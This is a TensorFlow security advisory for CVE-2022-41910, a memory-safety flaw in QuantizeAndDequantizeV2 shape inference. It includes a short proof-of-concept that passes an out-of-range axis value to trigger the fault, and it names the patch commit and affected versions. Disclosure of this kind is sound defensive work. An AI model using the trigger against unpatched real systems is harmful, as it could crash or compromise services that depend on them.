CVE-2022-41910
The function QuantizeAndDequantizeV2/V3/V4Grad an axis less than kint32max, or its shape inference can have address sanitizer issues.
import tensorflow as tf
@tf.function
def test():
tf.raw_ops.QuantizeAndDequantizeV2(input=[2.5],
input_min=[1.0],
input_max=[10.0],
signed_input=True,
num_bits=1,
range_given=True,
round_mode='HALF_TO_EVEN',
narrow_range=True,
axis=0x7fffffff)
test()We have patched the issue in GitHub commit 7b174a0f2e40ff3f3aa957aecddfd5aaae35eccb.
The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported through the OSS VRP program.